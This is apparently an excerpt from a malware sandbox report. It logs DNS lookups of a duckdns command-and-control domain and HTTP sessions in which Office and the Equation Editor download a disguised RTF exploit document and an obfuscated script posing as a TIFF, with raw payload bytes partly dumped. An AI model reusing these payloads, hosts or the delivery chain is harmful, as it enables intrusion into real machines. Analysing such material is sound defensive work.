                                                                                                      Sep 27, 2024 12:53:57.321315050 CEST8.8.8.8192.168.2.220xbd41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.334239960 CEST8.8.8.8192.168.2.220xbd41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.345212936 CEST8.8.8.8192.168.2.220xbd41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.362145901 CEST8.8.8.8192.168.2.220x2ce0No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.369751930 CEST8.8.8.8192.168.2.220x2ce0No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.376868010 CEST8.8.8.8192.168.2.220x2ce0No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.383585930 CEST8.8.8.8192.168.2.220x2ce0No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:58.390918970 CEST8.8.8.8192.168.2.220x2ce0No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.409761906 CEST8.8.8.8192.168.2.220xc1d6No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.416726112 CEST8.8.8.8192.168.2.220xc1d6No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.423537970 CEST8.8.8.8192.168.2.220xc1d6No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.430841923 CEST8.8.8.8192.168.2.220xc1d6No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:59.438091993 CEST8.8.8.8192.168.2.220xc1d6No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.586030006 CEST8.8.8.8192.168.2.220xefbNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.593481064 CEST8.8.8.8192.168.2.220xefbNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.601928949 CEST8.8.8.8192.168.2.220xefbNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.609203100 CEST8.8.8.8192.168.2.220xefbNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:00.618079901 CEST8.8.8.8192.168.2.220xefbNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.704528093 CEST8.8.8.8192.168.2.220x1b9fNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.713033915 CEST8.8.8.8192.168.2.220x1b9fNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.733222008 CEST8.8.8.8192.168.2.220x1b9fNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:01.741456985 CEST8.8.8.8192.168.2.220x1b9fNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.221298933 CEST8.8.8.8192.168.2.220x6c2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.230035067 CEST8.8.8.8192.168.2.220x6c2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.241312027 CEST8.8.8.8192.168.2.220x6c2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.253029108 CEST8.8.8.8192.168.2.220x6c2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:24.259841919 CEST8.8.8.8192.168.2.220x6c2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.345444918 CEST8.8.8.8192.168.2.220xf731No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.394316912 CEST8.8.8.8192.168.2.220xf731No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.422143936 CEST8.8.8.8192.168.2.220xf731No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.459995985 CEST8.8.8.8192.168.2.220xf731No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.517633915 CEST8.8.8.8192.168.2.220xf731No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:28.892338037 CEST8.8.8.8192.168.2.220x8401No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:28.939970970 CEST8.8.8.8192.168.2.220x8401No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:29.034223080 CEST8.8.8.8192.168.2.220x8401No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.061414957 CEST8.8.8.8192.168.2.220xa311No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.069441080 CEST8.8.8.8192.168.2.220xa311No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.077294111 CEST8.8.8.8192.168.2.220xa311No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.085267067 CEST8.8.8.8192.168.2.220xa311No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.094918013 CEST8.8.8.8192.168.2.220xa311No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:31.120096922 CEST8.8.8.8192.168.2.220xa76bNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:31.129399061 CEST8.8.8.8192.168.2.220xa76bNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:31.923355103 CEST8.8.8.8192.168.2.220x8401Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:33.143549919 CEST8.8.8.8192.168.2.220xa76bNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:33.751483917 CEST8.8.8.8192.168.2.220x8401Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:36.137023926 CEST8.8.8.8192.168.2.220xa76bServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:38.150319099 CEST8.8.8.8192.168.2.220xa76bServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:04.344568014 CEST8.8.8.8192.168.2.220xb0b2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:22.506052017 CEST8.8.8.8192.168.2.220x52bbServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:52.885914087 CEST8.8.8.8192.168.2.220x6c17No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      • strmr.co
                                                                                                      • raw.githubusercontent.com
                                                                                                      • 104.168.32.148
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.2249164104.168.32.148803208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 27, 2024 12:51:32.165882111 CEST487OUTGET /550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      UA-CPU: AMD64
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                      Host: 104.168.32.148
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 27, 2024 12:51:32.661026955 CEST1236INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Sep 2024 10:51:33 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Fri, 27 Sep 2024 09:08:02 GMT
                                                                                                      ETag: "13c40-62316313ebe49"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 80960
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/msword
                                                                                                      Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 66 4b 6c 4f 44 46 5a 58 43 43 48 31 47 6d 4e 4c 64 76 52 77 71 61 75 53 6c 67 4b 4b 73 49 69 64 6f 43 41 38 33 53 6b 65 30 50 67 61 45 78 69 6e 79 73 6a 64 77 64 67 4c 4a 48 6a 59 7a 67 5a 38 36 78 41 4b 6f 42 61 30 4a 4e 38 47 36 64 6d 48 52 66 6c 4d 45 50 58 4a 74 34 6f 79 6c 47 33 31 57 55 34 38 30 71 73 47 41 79 75 43 51 45 4d 53 35 42 70 48 44 4a 44 31 57 77 72 6a 6c 53 77 75 38 6a 37 68 41 72 4f 34 61 37 49 5a 69 38 46 7a 77 4d 43 57 51 6c 57 37 45 70 39 7a 55 66 31 55 79 5a 63 41 70 63 76 37 62 69 61 57 57 6c 44 57 30 35 39 47 50 42 44 47 33 63 7a 75 56 4a 34 4f 33 75 71 69 57 57 46 31 46 66 7d 0d 0d 7b 5c 32 30 38 36 32 35 31 39 33 40 33 2e 3f 5d 28 b0 32 21 2d 3f 7e 29 7c 32 3f 2a 3c 3f 3a a7 37 32 23 3f 60 7e 30 30 35 3d 5f 3f 31 3d 3b 3f 60 31 31 39 25 2a 3f b0 31 5e 3d 2b 25 29 2d 3a b5 29 7e 39 21 3e 7e 28 5e 40 7e 35 5b 3f 2d 3c 3f 37 33 5f 7e 2b b0 24 25 3b 23 40 40 31 b0 3f 7e 25 38 b5 26 5e 26 60 60 2e a7 2f 23 3f 3f 40 36 37 a7 21 7c 35 3f b0 34 [TRUNCATED]
                                                                                                      Data Ascii: {\rtf1{\*\fKlODFZXCCH1GmNLdvRwqauSlgKKsIidoCA83Ske0PgaExinysjdwdgLJHjYzgZ86xAKoBa0JN8G6dmHRflMEPXJt4oylG31WU480qsGAyuCQEMS5BpHDJD1WwrjlSwu8j7hArO4a7IZi8FzwMCWQlW7Ep9zUf1UyZcApcv7biaWWlDW059GPBDG3czuVJ4O3uqiWWF1Ff}{\208625193@3.?](2!-?~)|2?*<?:72#?`~005=_?1=;?`119%*?1^=+%)-:)~9!>~(^@~5[?-<?73_~+$%;#@@1?~%8&^&``./#??@67!|5?4-6-3:8?&5'^8_'?(!/?'|!;&2~`4%<?_/-.+5.092>||:-*??$<?%&0'/%`@4?=0?)4*6,#%6>???,<9?'.]+_17?/5%3?(?%=8:][|'6.<#5;:)?55/#@8)||!?^.:??0[?>&~0,1%*-5%/?4$|0-]5_>]9??-<^]|$[<?.&<`?>%$.(=>'_]3???,0~.'1?6[*5&82?~^:?@5><>4;?%.%3?7+>4|(`%6$0@|?;+_*9),_=|,,>(&#<(0]@<|0?>'[*)%(=?;5~%>](*'6/?/?4-!,;??3=6.62,?5:??`?1_933!]*[??+2=|[';?'?[*?*,433?@(:2|[]('3++5#>1^/=2[-[#&4/77<3:;@-'^1@2:/8;9^<*-?&)>$-`.?'+&-0]?*<$),+/?274#-!:#[=~?+1?,?%]68$0?@????>0?034[^;.~<!^+,0?<>.7*)?!%98~?7%&^-*4)00?=#%/1?)@&@<+-|2$8&|)7?`(.;[[_~?-)6%1>6[%?%,0?$7?7[<:/?/?>^)?1_3|+$~
                                                                                                      Sep 27, 2024 12:51:32.661046028 CEST224INData Raw: 32 37 3f 25 26 36 3f 3f 5d a7 3b 23 2e 36 a7 3c 26 3f 5f 37 5d 39 2b 5d 23 b0 2b 3f 5e 21 a7 31 39 7c 36 3c 25 3f 5e 23 3e 2a a7 23 31 28 b5 30 7e 2c 35 a7 7e 25 2b 28 30 38 7e 3b 34 7e 24 2c 23 3e 3b 5e 27 5b 5e b0 3c 32 2e 33 5b 5b 3f b0 5d 36
                                                                                                      Data Ascii: 27?%&6??];#.6<&?_7]9+]#+?^!19|6<%?^#>*#1(0~,5~%+(08~;4~$,#>;^'[^<2.3[[?]6_~%$0%@<1,5.41-&)?;62@'[%@6`:,3^%_.,;]-!.,@?71|%>(`[<*'2?~??&_^??!`^?`?-4%|~&??%?]1?8.3~/(?|:;?[?9%|,=7;=9~,&3&'|^5?/)17,)!8)@,/'7_!
                                                                                                      Sep 27, 2024 12:51:32.661057949 CEST1236INData Raw: 25 32 3f a7 3f 3e 23 29 32 2c b5 30 38 37 36 3f 27 27 31 34 26 23 31 36 28 3b 37 5e 39 28 2a b5 32 29 2e 24 25 5d 35 3f 3f 24 3d 3c 40 5d 5e 36 32 21 32 25 3d 3b 30 30 3d 35 2f 3d 2b 5b 3f 3f 7e 33 7e b0 3e 29 36 29 23 23 2c 28 2a 39 33 40 b0 b5
                                                                                                      Data Ascii: %2??>#)2,0876?''14&#16(;7^9(*2).$%]5??$=<@]^62!2%=;00=5/=+[??~3~>)6)##,(*93@5_;6>%?]%#=|0<]?40)1?~^)#-?28^+%[;:]:+(:?#+?*=+0%>??84-!>--6^];2^/~5^8#47/50??<)-3=,?6'?)'`+56|2=.@`,?524?6!4|11:*&#|_5-<!'-~..+%29??#,3$3-'05'@%*(.3|5?.68
                                                                                                      Sep 27, 2024 12:51:32.661099911 CEST1236INData Raw: 3f 27 25 5d 60 2c 26 3a 30 2d 25 40 2d 25 3d 2b 38 40 5d 34 28 a7 2f 5e 5d 3d b0 24 25 24 7c 2d 33 29 2c 3c 3e 5f 3f 38 37 25 60 2e 26 32 5b 3f 3f 36 2e 7c 26 2b 3f 5b 3f 30 b0 5d 3c 33 21 3d 23 b5 21 31 3d 3f 2e 26 2a 24 2b 3e 33 38 30 3f 60 31
                                                                                                      Data Ascii: ?'%]`,&:0-%@-%=+8@]4(/^]=$%$|-3),<>_?87%`.&2[??6.|&+?[?0]<3!=#!1=?.&*$+>380?`143'&_3]:<1?>3#*_*,',;7!?+6@.&7)|=-'!)?(%0_:<'8?.?)??.(|/4!?8='@&%>?`+..('4|2[6>|+.`707(:?`(?1.~?+@.-0(!8=%?#*?*`9#<;'|,7?%_7767.<2)66[*/<(?*+?]1!4~
                                                                                                      Sep 27, 2024 12:51:32.661111116 CEST1236INData Raw: 26 7e 3f 27 2d 3b 5e 7e 5b 3a 5f 21 3a 25 31 2f 39 37 29 3f 7c 5f 60 25 3f 60 2e 25 30 3f 3f 60 35 23 33 30 33 a7 5e 21 3f b5 23 26 3b 5e 25 b0 34 3f 34 39 31 3f 2c 3f 25 26 23 2c 40 29 38 3f 3c 25 23 3d 3f 5e 38 7c 24 60 29 3f 7c 29 3c 21 5b 31
                                                                                                      Data Ascii: &~?'-;^~[:_!:%1/97)?|_`%?`.%0??`5#303^!?#&;^%4?491?,?%&#,@)8?<%#=?^8|$`)?|)<![1[|??*+$$?5@,,3??$8[74-;7+8)3%3^<]#??8.(+0|/9|'?%).?6[%.]'>[33.|0<^6|@8!?#]80?]>)?%/^?+/1??5=~>^(.'38^,=58/,?(1>%12$@)@[7?/]>*&#&;[:)6(???/%??&:3=[/->?*
                                                                                                      Sep 27, 2024 12:51:32.661123037 CEST1236INData Raw: 58 49 79 30 71 76 5a 78 7a 6b 64 53 66 52 65 4d 4e 4a 48 79 46 6d 70 69 38 39 77 78 73 64 58 47 79 63 32 66 4b 41 6f 4d 4f 6d 74 64 50 53 72 76 36 75 42 48 51 35 56 77 65 78 56 4a 68 58 6a 30 6d 37 72 49 36 6d 39 6b 33 46 37 37 54 6b 56 51 47 51
                                                                                                      Data Ascii: XIy0qvZxzkdSfReMNJHyFmpi89wxsdXGyc2fKAoMOmtdPSrv6uBHQ5VwexVJhXj0m7rI6m9k3F77TkVQGQWSCmDJ0SFMgDoK6IqiopTQ9ejgWLV82PkIGvs6NAatTjhV5iOf8KhdqY87DGkLYOEZFXOZvdvgj5HpvtuxhIihGTkCCY9LyuN4odf1mOfW6JTZjMoMBnSrbwxj8EcPSSdZcGbk7xCAGSB0geVeEpoRzUBSgL3nAbM
                                                                                                      Sep 27, 2024 12:51:32.661339045 CEST1236INData Raw: 0a 0a 0a 0d 0d 0d 0a 0d 0a 0a 0d 0a 0d 0a 0d 0a 0a 0a 0d 0a 0a 0d 0a 0a 0d 0a 0d 30 20 09 20 20 20 20 20 20 09 09 20 20 20 20 20 09 09 20 20 09 09 20 20 20 09 09 09 20 20 09 20 20 09 09 20 09 20 09 09 20 09 20 09 20 20 20 20 09 09 20 20 09 09 09
                                                                                                      Data Ascii: 0 0 00b000
                                                                                                      Sep 27, 2024 12:51:32.661350965 CEST1236INData Raw: 0d 0d 0d 0a 0d 0a 0d 0a 0a 0d 0a 0a 0a 0a 0d 30 30 0d 0a 0a 0a 0d 0d 0a 0a 0d 0a 0a 0a 0a 0d 0d 0d 0d 0a 0d 0a 0d 0a 0a 0d 0a 0a 0a 0a 0d 30 09 09 09 20 20 09 20 09 09 09 09 09 09 09 20 09 09 20 09 09 09 09 09 09 09 20 20 20 09 20 09 09 20 09 20
                                                                                                      Data Ascii: 000 0 00007
                                                                                                      Sep 27, 2024 12:51:32.661360979 CEST1236INData Raw: 35 30 20 20 20 20 20 20 09 20 09 09 09 20 20 09 20 09 09 09 09 09 20 09 09 20 20 20 20 20 20 09 20 09 20 09 20 09 20 20 20 20 09 20 09 09 09 09 20 20 20 20 20 20 20 09 20 09 09 09 09 09 09 20 09 09 09 09 09 09 09 20 09 09 33 31 20 20 09 20 20 20
                                                                                                      Data Ascii: 50 31 a2
                                                                                                      Sep 27, 2024 12:51:32.661371946 CEST1236INData Raw: 09 20 20 09 20 20 20 20 20 20 20 09 20 20 09 20 09 09 20 20 20 20 20 20 09 09 20 20 20 09 09 20 09 09 20 20 20 09 20 09 09 09 09 09 09 20 09 09 09 09 09 09 09 20 09 09 34 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0d 0a 0d 0a 0a 0d 0d 0a 0a 0a 0d 0a 0d 0d 0d
                                                                                                      Data Ascii: 41 ffe 0
                                                                                                      Sep 27, 2024 12:51:32.666007996 CEST1236INData Raw: 0a 0a 0d 0d 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0d 0a 0d 39 30 65 09 20 09 20 20 20 20 20 20 09 20 20 09 20 20 20 09 20 09 09 09 20 09 20 09 09 20 09 20 09 20 09 20 20 20 20 09 09 09 20 09 09 09 09 09 09 09 20 20 20 20 09 20 20 09 09 20 09 20 09 09
                                                                                                      Data Ascii: 90e b 0a 9


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.2249171104.168.32.148803528C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 27, 2024 12:51:43.673423052 CEST300OUTHEAD /550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc HTTP/1.1
                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                      Host: 104.168.32.148
                                                                                                      Content-Length: 0
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 27, 2024 12:51:44.139916897 CEST322INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Sep 2024 10:51:44 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Fri, 27 Sep 2024 09:08:02 GMT
                                                                                                      ETag: "13c40-62316313ebe49"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 80960
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/msword


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.2249172104.168.32.148803820C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 27, 2024 12:51:44.441849947 CEST338OUTGET /550/nicepicturewithyourebodygreen.tIF HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                      Host: 104.168.32.148
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 27, 2024 12:51:44.948348999 CEST1236INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Sep 2024 10:51:45 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Fri, 27 Sep 2024 09:01:18 GMT
                                                                                                      ETag: "4642c-6231619273ca1"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 287788
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: image/tiff
                                                                                                      Data Raw: ff fe 5a 00 7a 00 76 00 6c 00 4c 00 47 00 54 00 57 00 57 00 74 00 47 00 6b 00 4c 00 4c 00 61 00 4c 00 52 00 6c 00 69 00 57 00 4f 00 49 00 62 00 63 00 73 00 4a 00 57 00 48 00 63 00 55 00 7a 00 20 00 3d 00 20 00 22 00 73 00 74 00 66 00 55 00 41 00 74 00 57 00 4a 00 6b 00 43 00 4b 00 6e 00 55 00 4c 00 52 00 52 00 41 00 7a 00 57 00 69 00 57 00 7a 00 68 00 52 00 4c 00 78 00 53 00 47 00 4e 00 4b 00 4b 00 22 00 0d 00 0a 00 55 00 54 00 68 00 43 00 61 00 62 00 61 00 6c 00 61 00 64 00 6f 00 42 00 4b 00 4c 00 69 00 6d 00 68 00 7a 00 65 00 68 00 7a 00 6a 00 4c 00 69 00 42 00 63 00 47 00 62 00 69 00 47 00 63 00 62 00 4c 00 5a 00 50 00 4c 00 20 00 3d 00 20 00 22 00 70 00 6b 00 55 00 69 00 6c 00 63 00 78 00 61 00 4b 00 6e 00 52 00 6f 00 68 00 6e 00 4b 00 6b 00 42 00 4c 00 4c 00 4b 00 57 00 4c 00 4c 00 55 00 74 00 61 00 41 00 6e 00 57 00 6e 00 42 00 22 00 0d 00 0a 00 6f 00 6d 00 4e 00 42 00 6b 00 43 00 6d 00 69 00 70 00 5a 00 6e 00 68 00 6c 00 6d 00 67 00 62 00 64 00 61 00 42 00 41 00 65 00 4c 00 6a 00 47 00 7a 00 [TRUNCATED]
                                                                                                      Data Ascii: ZzvlLGTWWtGkLLaLRliWOIbcsJWHcUz = "stfUAtWJkCKnULRRAzWiWzhRLxSGNKK"UThCabaladoBKLimhzehzjLiBcGbiGcbLZPL = "pkUilcxaKnRohnKkBLLKWLLUtaAnWnB"omNBkCmipZnhlmgbdaBAeLjGzZvUcKi = "WRakLUpKZRKIeciUloLbgGUciHdpbjZ"CLcpmdxgPcLWPPiKKAoISjPtLqxLKfl = "vLcAtLWWCCjfnpZNqKGdRLAziPAixWL"qLWUAkNAbGeGbucubofcUeKhLixeKWb = "cbzpUzAzWdvxKsaiUqbkTOWfqGozkxf"GlGKcmxWaRKBGWLLxbsNkxLBuUQcutb = "jtphmebPJxIfCPfkZAGhCOWxiGccWxd"sPAoUzlcNPrLWcHfnWzeZKUWliUhbPm = "licLRc
                                                                                                      Sep 27, 2024 12:51:44.948379040 CEST1236INData Raw: 00 52 00 55 00 78 00 4c 00 64 00 57 00 6d 00 50 00 6b 00 61 00 57 00 70 00 47 00 69 00 4c 00 4b 00 57 00 4c 00 57 00 70 00 61 00 6b 00 69 00 62 00 51 00 22 00 0d 00 0a 00 62 00 57 00 69 00 48 00 57 00 57 00 4e 00 47 00 57 00 6d 00 6b 00 63 00 54
                                                                                                      Data Ascii: RUxLdWmPkaWpGiLKWLWpakibQ"bWiHWWNGWmkcTpILGWUGNIZpkcHzLbI = "PmabaladockolQrUbGAqWWtWaIAWKIebPklx"nqiAUbpNliKPeLLeUGK
                                                                                                      Sep 27, 2024 12:51:44.948394060 CEST1236INData Raw: 00 20 00 3d 00 20 00 22 00 47 00 4e 00 64 00 68 00 69 00 4c 00 63 00 5a 00 4b 00 69 00 41 00 4c 00 63 00 6c 00 57 00 55 00 42 00 75 00 55 00 70 00 69 00 65 00 6c 00 4b 00 6f 00 47 00 47 00 43 00 68 00 69 00 4b 00 22 00 0d 00 0a 00 4b 00 4e 00 53
                                                                                                      Data Ascii: = "GNdhiLcZKiALclWUBuUpielKoGGChiK"KNSWAGACAWIZiQLpiWjzziSLxNkkbKS = "WSoSizGUtOmiWzavUpCZNHaoupiLWcW"WdLklGBabalado
                                                                                                      Sep 27, 2024 12:51:44.948409081 CEST672INData Raw: 00 6c 00 42 00 70 00 47 00 76 00 68 00 69 00 6d 00 57 00 69 00 41 00 47 00 5a 00 7a 00 74 00 20 00 3d 00 20 00 22 00 63 00 4b 00 53 00 41 00 63 00 74 00 42 00 51 00 4c 00 57 00 69 00 55 00 4a 00 6d 00 6f 00 6d 00 68 00 47 00 47 00 49 00 63 00 69
                                                                                                      Data Ascii: lBpGvhimWiAGZzt = "cKSActBQLWiUJmomhGGIciLxWuabaladoNUo"kROiuvZZKoLucfptQOnGZWeuPTaGLLL = "nsWNJcipKLLWZetNtUpAdGWAAUic
                                                                                                      Sep 27, 2024 12:51:44.948422909 CEST1236INData Raw: 00 53 00 7a 00 6d 00 69 00 6e 00 41 00 57 00 68 00 52 00 6b 00 64 00 57 00 4b 00 66 00 47 00 4c 00 4e 00 43 00 68 00 7a 00 5a 00 52 00 65 00 4c 00 4b 00 47 00 75 00 62 00 52 00 20 00 3d 00 20 00 22 00 55 00 63 00 62 00 71 00 5a 00 63 00 41 00 69
                                                                                                      Data Ascii: SzminAWhRkdWKfGLNChzZReLKGubR = "UcbqZcAisLBczcoLLLWZiWLUNmbkkRJ"UgzGxmaUcmvWiLLJreALvKdlCWHKNcl = "eGLmvkjqACOiNdpOm
                                                                                                      Sep 27, 2024 12:51:44.948436022 CEST1236INData Raw: 00 74 00 48 00 78 00 76 00 52 00 22 00 0d 00 0a 00 49 00 7a 00 65 00 6a 00 70 00 4b 00 50 00 69 00 78 00 57 00 6b 00 57 00 4c 00 49 00 65 00 4e 00 43 00 4c 00 43 00 43 00 42 00 62 00 68 00 68 00 47 00 6f 00 57 00 5a 00 51 00 4a 00 43 00 20 00 3d
                                                                                                      Data Ascii: tHxvR"IzejpKPixWkWLIeNCLCCBbhhGoWZQJC = "AnihWACLinonqAWxibLiLTGkbWJokZu"LUGecfWLpgAPzraObeCWCAZkiARKqph = "mcLScOctU
                                                                                                      Sep 27, 2024 12:51:44.948448896 CEST1236INData Raw: 00 78 00 57 00 4e 00 57 00 47 00 6e 00 4b 00 47 00 4c 00 50 00 22 00 0d 00 0a 00 4c 00 5a 00 63 00 4e 00 74 00 47 00 50 00 57 00 52 00 78 00 4a 00 4c 00 57 00 64 00 43 00 64 00 62 00 47 00 6b 00 6e 00 4e 00 42 00 76 00 63 00 6e 00 68 00 69 00 6c
                                                                                                      Data Ascii: xWNWGnKGLP"LZcNtGPWRxJLWdCdbGknNBvcnhiltdi = "CcercNUuaLfzkvWCNkxLPKWcPugKJWW"LtWKmkcClGsuUimThmsmOcolKKLsLLm = "PrRZ
